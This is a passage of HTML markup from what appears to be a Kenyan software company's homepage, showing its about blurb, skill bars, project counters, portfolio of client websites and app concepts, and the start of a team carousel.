data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<h5 class=\"elementor-heading-title elementor-size-default\">ABOUT US<\/h5>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-6352d87 elementor-widget elementor-widget-text-editor\" data-id=\"6352d87\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-text-editor elementor-clearfix\">\n\t\t\t\t<p>A Kenyan software development company that specializes in mobile application development and website development.  <\/p>\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-1360d03 elementor-widget elementor-widget-image\" data-id=\"1360d03\" data-element_type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t<img width=\"1130\" height=\"564\" src=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo.png\" class=\"attachment-full size-full\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo.png 1130w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo-300x150.png 300w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo-1024x511.png 1024w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo-768x383.png 768w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo-830x414.png 830w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo-230x115.png 230w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo-350x175.png 350w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo-480x240.png 480w\" sizes=\"(max-width: 1130px) 100vw, 1130px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-46b4b04\" data-id=\"46b4b04\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-24647b5 elementor-widget elementor-widget-heading\" data-id=\"24647b5\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-large\">what we do<\/h2>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-6dfbf46 skills_percentage_fix elementor-widget elementor-widget-progress\" data-id=\"6dfbf46\" data-element_type=\"widget\" data-widget_type=\"progress.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t<span class=\"elementor-title\">MOBILE APP DEVELOPMENT<\/span>\n\t\t\n\t\t<div class=\"elementor-progress-wrapper\" role=\"progressbar\" aria-valuemin=\"0\" aria-valuemax=\"100\" aria-valuenow=\"95\" aria-valuetext=\"\">\n\t\t\t<div class=\"elementor-progress-bar\" data-max=\"95\">\n\t\t\t\t<span class=\"elementor-progress-text\"><\/span>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-ce040ea skills_percentage_fix elementor-widget elementor-widget-progress\" data-id=\"ce040ea\" data-element_type=\"widget\" data-widget_type=\"progress.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t<span class=\"elementor-title\">UX \/UI design<\/span>\n\t\t\n\t\t<div class=\"elementor-progress-wrapper\" role=\"progressbar\" aria-valuemin=\"0\" aria-valuemax=\"100\" aria-valuenow=\"100\" aria-valuetext=\"\">\n\t\t\t<div class=\"elementor-progress-bar\" data-max=\"100\">\n\t\t\t\t<span class=\"elementor-progress-text\"><\/span>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-a9cd16d skills_percentage_fix elementor-widget elementor-widget-progress\" data-id=\"a9cd16d\" data-element_type=\"widget\" data-widget_type=\"progress.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t<span class=\"elementor-title\">WEBSITE DEVELOPMENT<\/span>\n\t\t\n\t\t<div class=\"elementor-progress-wrapper\" role=\"progressbar\" aria-valuemin=\"0\" aria-valuemax=\"100\" aria-valuenow=\"99\" aria-valuetext=\"\">\n\t\t\t<div class=\"elementor-progress-bar\" data-max=\"99\">\n\t\t\t\t<span class=\"elementor-progress-text\"><\/span>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-fab181c skills_percentage_fix elementor-widget elementor-widget-progress\" data-id=\"fab181c\" data-element_type=\"widget\" data-widget_type=\"progress.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t<span class=\"elementor-title\">IoT and Bots<\/span>\n\t\t\n\t\t<div class=\"elementor-progress-wrapper\" role=\"progressbar\" aria-valuemin=\"0\" aria-valuemax=\"100\" aria-valuenow=\"60\" aria-valuetext=\"\">\n\t\t\t<div class=\"elementor-progress-bar\" data-max=\"60\">\n\t\t\t\t<span class=\"elementor-progress-text\"><\/span>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bb883c1 elementor-section-stretched elementor-section-height-min-height elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-items-middle\" data-id=\"bb883c1\" data-element_type=\"section\" data-settings=\"{"stretch_section":"section-stretched","background_background":"classic"}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-3b93627\" data-id=\"3b93627\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-019c928 elementor-position-left center_icons_fix elementor-view-default elementor-vertical-align-top elementor-widget elementor-widget-icon-box\" data-id=\"019c928\" data-element_type=\"widget\" data-widget_type=\"icon-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-icon-box-wrapper\">\n\t\t\t\t\t\t<div class=\"elementor-icon-box-icon\">\n\t\t\t\t<span class=\"elementor-icon elementor-animation-\" >\n\t\t\t\t<i aria-hidden=\"true\" class=\"fas fa-chart-pie\"><\/i>\t\t\t\t<\/span>\n\t\t\t<\/div>\n\t\t\t\t\t\t<div class=\"elementor-icon-box-content\">\n\t\t\t\t<p class=\"elementor-icon-box-title\">\n\t\t\t\t\t<span >\n\t\t\t\t\t\t15 \t\t\t\t\t<\/span>\n\t\t\t\t<\/p>\n\t\t\t\t\t\t\t\t\t<p class=\"elementor-icon-box-description\">\n\t\t\t\t\t\tPROJECTS COMPLETED\t\t\t\t\t<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-d9a9f4e\" data-id=\"d9a9f4e\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-75ca8eb elementor-position-left center_icons_fix elementor-view-default elementor-vertical-align-top elementor-widget elementor-widget-icon-box\" data-id=\"75ca8eb\" data-element_type=\"widget\" data-widget_type=\"icon-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-icon-box-wrapper\">\n\t\t\t\t\t\t<div class=\"elementor-icon-box-icon\">\n\t\t\t\t<span class=\"elementor-icon elementor-animation-\" >\n\t\t\t\t<i aria-hidden=\"true\" class=\"fas fa-heart\"><\/i>\t\t\t\t<\/span>\n\t\t\t<\/div>\n\t\t\t\t\t\t<div class=\"elementor-icon-box-content\">\n\t\t\t\t<p class=\"elementor-icon-box-title\">\n\t\t\t\t\t<span >\n\t\t\t\t\t\t24+\t\t\t\t\t<\/span>\n\t\t\t\t<\/p>\n\t\t\t\t\t\t\t\t\t<p class=\"elementor-icon-box-description\">\n\t\t\t\t\t\tHAPPY CLIENTS\t\t\t\t\t<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-da1af0b\" data-id=\"da1af0b\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4b088f4 elementor-position-left center_icons_fix elementor-view-default elementor-vertical-align-top elementor-widget elementor-widget-icon-box\" data-id=\"4b088f4\" data-element_type=\"widget\" data-widget_type=\"icon-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-icon-box-wrapper\">\n\t\t\t\t\t\t<div class=\"elementor-icon-box-icon\">\n\t\t\t\t<span class=\"elementor-icon elementor-animation-\" >\n\t\t\t\t<i aria-hidden=\"true\" class=\"fas fa-coffee\"><\/i>\t\t\t\t<\/span>\n\t\t\t<\/div>\n\t\t\t\t\t\t<div class=\"elementor-icon-box-content\">\n\t\t\t\t<p class=\"elementor-icon-box-title\">\n\t\t\t\t\t<span >\n\t\t\t\t\t\t1000+\t\t\t\t\t<\/span>\n\t\t\t\t<\/p>\n\t\t\t\t\t\t\t\t\t<p class=\"elementor-icon-box-description\">\n\t\t\t\t\t\tCOFFEE CUPS \ud83d\ude09\t\t\t\t\t<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-48774a4 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"48774a4\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9869010\" data-id=\"9869010\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4cd0216 elementor-widget elementor-widget-heading\" data-id=\"4cd0216\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Our Work<\/h1>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-ffc665b elementor-widget elementor-widget-heading\" data-id=\"ffc665b\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<h3 class=\"elementor-heading-title elementor-size-default\">We build future-proof projects with latest technologies and strategies with exceptional user experience that adds value to every business.<\/h3>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-96c808e our_work elementor-widget elementor-widget-athemes-portfolio\" data-id=\"96c808e\" data-element_type=\"widget\" data-widget_type=\"athemes-portfolio.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\n\t\t<div class=\"project-wrap portfolio-section style1\">\n\n\t\t\t<ul class=\"project-filter\" id=\"filters\">\n\t\t\t\t<li><a href=\"#\" data-filter=\"*\">Show all<\/a><\/li>\n\n\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\n\t\t\t\t\t<li><a href='#' data-filter='.logo'>Logo<\/a><\/li>\n\n\t\t\t\t\n\t\t\t\t\t<li><a href='#' data-filter='.websites'>Websites<\/a><\/li>\n\n\t\t\t\t\n\t\t\t\t\t<li><a href='#' data-filter='.ux'>UX<\/a><\/li>\n\n\t\t\t\t\n\t\t\t\t\t<li><a href='#' data-filter='.intergrations'>Intergrations<\/a><\/li>\n\n\t\t\t\t\n\t\t\t<\/ul>\n\n\t\t\t<div class=\"roll-project fullwidth\">\n\t\t\t\t<div class=\"isotope-container\" data-portfolio-effect=\"fadeInUp\">\n\n\t\t\t\t\t\t\t\t \n\t\t\t\t<div class=\"project-item item isotope-item logo\">\n\t\t\t\t\t<div class=\"project-inner\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t<a href=\"www.neutrontech.co.ke\" class=\"project-pop-wrap\" target=\"_blank\" rel=\"nofollow\">\n\t\t\t\t\t\t\t<div class=\"project-pop\"><\/div>\n\t\t\t\t\t\t\t<div class=\"project-title-wrap\">\n\t\t\t\t\t\t\t\t<h3 class=\"project-title\">\n\t\t\t\t\t\t\t\t\t<span>Neutron Tech<\/span>\n\t\t\t\t\t\t\t\t<\/h3>\n\t\t\t\t\t\t\t<\/div>\t\t\t\t\t\t\t\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<a href=\"#\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/NT.jpeg\" alt=\"NT\"\/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t\t\t\t\t \n\t\t\t\t<div class=\"project-item item isotope-item websites\">\n\t\t\t\t\t<div class=\"project-inner\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t<a href=\"https:\/\/www.kazionline.co.ke\/\" class=\"project-pop-wrap\" target=\"_blank\" rel=\"nofollow\">\n\t\t\t\t\t\t\t<div class=\"project-pop\"><\/div>\n\t\t\t\t\t\t\t<div class=\"project-title-wrap\">\n\t\t\t\t\t\t\t\t<h3 class=\"project-title\">\n\t\t\t\t\t\t\t\t\t<span>Kazi Online<\/span>\n\t\t\t\t\t\t\t\t<\/h3>\n\t\t\t\t\t\t\t<\/div>\t\t\t\t\t\t\t\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<a href=\"#\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/kazionline.jpg\" alt=\"kazionline\"\/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t\t\t\t\t \n\t\t\t\t<div class=\"project-item item isotope-item logo\">\n\t\t\t\t\t<div class=\"project-inner\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t<a href=\"https:\/\/techxers.co.ke\/\" class=\"project-pop-wrap\" target=\"_blank\" rel=\"nofollow\">\n\t\t\t\t\t\t\t<div class=\"project-pop\"><\/div>\n\t\t\t\t\t\t\t<div class=\"project-title-wrap\">\n\t\t\t\t\t\t\t\t<h3 class=\"project-title\">\n\t\t\t\t\t\t\t\t\t<span>TechXers<\/span>\n\t\t\t\t\t\t\t\t<\/h3>\n\t\t\t\t\t\t\t<\/div>\t\t\t\t\t\t\t\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<a href=\"#\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo.png\" alt=\"logo\"\/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t\t\t\t\t \n\t\t\t\t<div class=\"project-item item isotope-item websites\">\n\t\t\t\t\t<div class=\"project-inner\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t<a href=\"https:\/\/tazamatv.co.ke\/\" class=\"project-pop-wrap\" target=\"_blank\" rel=\"nofollow\">\n\t\t\t\t\t\t\t<div class=\"project-pop\"><\/div>\n\t\t\t\t\t\t\t<div class=\"project-title-wrap\">\n\t\t\t\t\t\t\t\t<h3 class=\"project-title\">\n\t\t\t\t\t\t\t\t\t<span>Tazama TV<\/span>\n\t\t\t\t\t\t\t\t<\/h3>\n\t\t\t\t\t\t\t<\/div>\t\t\t\t\t\t\t\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<a href=\"#\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/tv.png\" alt=\"tv\"\/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t\t\t\t\t \n\t\t\t\t<div class=\"project-item item isotope-item websites\">\n\t\t\t\t\t<div class=\"project-inner\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t<a href=\"http:\/\/etha.in\/\" class=\"project-pop-wrap\" target=\"_blank\" rel=\"nofollow\">\n\t\t\t\t\t\t\t<div class=\"project-pop\"><\/div>\n\t\t\t\t\t\t\t<div class=\"project-title-wrap\">\n\t\t\t\t\t\t\t\t<h3 class=\"project-title\">\n\t\t\t\t\t\t\t\t\t<span>EMA Systems<\/span>\n\t\t\t\t\t\t\t\t<\/h3>\n\t\t\t\t\t\t\t<\/div>\t\t\t\t\t\t\t\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<a href=\"#\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/07\/WhatsApp-Image-2020-07-22-at-7.55.22-PM.jpeg\" alt=\"WhatsApp Image 2020-07-22 at 7.55.22 PM\"\/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t\t\t\t\t \n\t\t\t\t<div class=\"project-item item isotope-item ux\">\n\t\t\t\t\t<div class=\"project-inner\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t<a href=\"https:\/\/xd.adobe.com\/view\/5d05023d-7de5-4cff-664f-66ea4fa6527c-2b34\/\" class=\"project-pop-wrap\" target=\"_blank\" rel=\"nofollow\">\n\t\t\t\t\t\t\t<div class=\"project-pop\"><\/div>\n\t\t\t\t\t\t\t<div class=\"project-title-wrap\">\n\t\t\t\t\t\t\t\t<h3 class=\"project-title\">\n\t\t\t\t\t\t\t\t\t<span>Instant Fine App Concept<\/span>\n\t\t\t\t\t\t\t\t<\/h3>\n\t\t\t\t\t\t\t<\/div>\t\t\t\t\t\t\t\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<a href=\"#\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/roadside2.png\" alt=\"roadside2\"\/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t\t\t\t\t \n\t\t\t\t<div class=\"project-item item isotope-item websites\">\n\t\t\t\t\t<div class=\"project-inner\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t<a href=\"http:\/\/marasi.co.ke\/\" class=\"project-pop-wrap\" target=\"_blank\" rel=\"nofollow\">\n\t\t\t\t\t\t\t<div class=\"project-pop\"><\/div>\n\t\t\t\t\t\t\t<div class=\"project-title-wrap\">\n\t\t\t\t\t\t\t\t<h3 class=\"project-title\">\n\t\t\t\t\t\t\t\t\t<span>Marasi Law Blog<\/span>\n\t\t\t\t\t\t\t\t<\/h3>\n\t\t\t\t\t\t\t<\/div>\t\t\t\t\t\t\t\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<a href=\"#\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/law.png\" alt=\"law\"\/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t\t\t\t\t \n\t\t\t\t<div class=\"project-item item isotope-item ux\">\n\t\t\t\t\t<div class=\"project-inner\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t<a href=\"https:\/\/xd.adobe.com\/view\/774768df-1dd3-4cb5-5223-10c24f1a0b9c-0176\/\" class=\"project-pop-wrap\" target=\"_blank\" rel=\"nofollow\">\n\t\t\t\t\t\t\t<div class=\"project-pop\"><\/div>\n\t\t\t\t\t\t\t<div class=\"project-title-wrap\">\n\t\t\t\t\t\t\t\t<h3 class=\"project-title\">\n\t\t\t\t\t\t\t\t\t<span>Bloom Flower App<\/span>\n\t\t\t\t\t\t\t\t<\/h3>\n\t\t\t\t\t\t\t<\/div>\t\t\t\t\t\t\t\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<a href=\"#\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/bloom.png\" alt=\"bloom\"\/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t\t\t\t\t \n\t\t\t\t<div class=\"project-item item isotope-item intergrations\">\n\t\t\t\t\t<div class=\"project-inner\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t<a href=\"#\" class=\"project-pop-wrap\" target=\"_blank\" rel=\"nofollow\">\n\t\t\t\t\t\t\t<div class=\"project-pop\"><\/div>\n\t\t\t\t\t\t\t<div class=\"project-title-wrap\">\n\t\t\t\t\t\t\t\t<h3 class=\"project-title\">\n\t\t\t\t\t\t\t\t\t<span>Dahua sdk programming <\/span>\n\t\t\t\t\t\t\t\t<\/h3>\n\t\t\t\t\t\t\t<\/div>\t\t\t\t\t\t\t\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<a href=\"#\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/dahua.png\" alt=\"dahua\"\/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t\t\t\t\t \n\t\t\t\t<div class=\"project-item item isotope-item ux\">\n\t\t\t\t\t<div class=\"project-inner\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t<a href=\"Dating App Concept\" class=\"project-pop-wrap\" target=\"_blank\" rel=\"nofollow\">\n\t\t\t\t\t\t\t<div class=\"project-pop\"><\/div>\n\t\t\t\t\t\t\t<div class=\"project-title-wrap\">\n\t\t\t\t\t\t\t\t<h3 class=\"project-title\">\n\t\t\t\t\t\t\t\t\t<span>Project title<\/span>\n\t\t\t\t\t\t\t\t<\/h3>\n\t\t\t\t\t\t\t<\/div>\t\t\t\t\t\t\t\n\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t<a href=\"#\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/07\/DatesSafi.png\" alt=\"DatesSafi\"\/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t\t\t\t\t\n\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t<\/div>\n\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4cd33b6 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4cd33b6\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-dc0383a\" data-id=\"dc0383a\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-86dc824 elementor-widget elementor-widget-heading\" data-id=\"86dc824\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Meet Our Team<\/h1>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-0a8fe85 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0a8fe85\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-2bfdc7a\" data-id=\"2bfdc7a\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-524c4b4 team_hover_edits elementor-widget elementor-widget-athemes-employee-carousel\" data-id=\"524c4b4\" data-element_type=\"widget\" data-widget_type=\"athemes-employee-carousel.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\n\t\t<div class=\"roll-team carousel owl-carousel\" data-widgetid=\"employees-\">\n\t\t\t\t\t\t\t\t\t\t<div class=\"team-item\">\n\t\t\t <div class=\"team-inner\">\n\t\t\t <div class=\"pop-overlay\">\n\t\t\t <div class=\"team-pop\">\n\t\t\t <div class=\"team-info\">\n\t\t\t\t\t\t\t\t<div class=\"name\">Mary Nyambura<\/div>\n\t\t\t\t\t\t\t\t<div class=\"pos\">Developer| UX enthusiast | Animation <\/div>\n\t\t\t\t\t\t\t\t<ul class=\"team-social\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<li><a class=\"facebook\" href=\"#\" target=\"_blank\"><i class=\"sydney-svg-icon\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 448 512\" fill=\"#fff;\"><path d=\"M279.14 288l14.22-92.66h-88.91v-60.13c0-25.35 12.42-50.06 52.24-50.06h40.42V6.26S260.43 0 225.36 0c-73.22 0-121.08 44.38-121.08 124.72v70.62H22.89V288h81.39v224h100.17V288z\"\/><\/svg><\/i><\/a><\/li>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<li><a class=\"twitter\" href=\"#\" target=\"_blank\"><i class=\"sydney-svg-icon\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\"><path d=\"M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 